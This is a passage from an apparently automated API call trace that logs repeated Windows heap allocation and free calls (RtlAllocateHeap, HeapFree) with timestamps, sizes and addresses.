| out: lpMsg=0x30ffb74) returned 0 [0175.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.392] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.407] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.416] HeapFree (in: 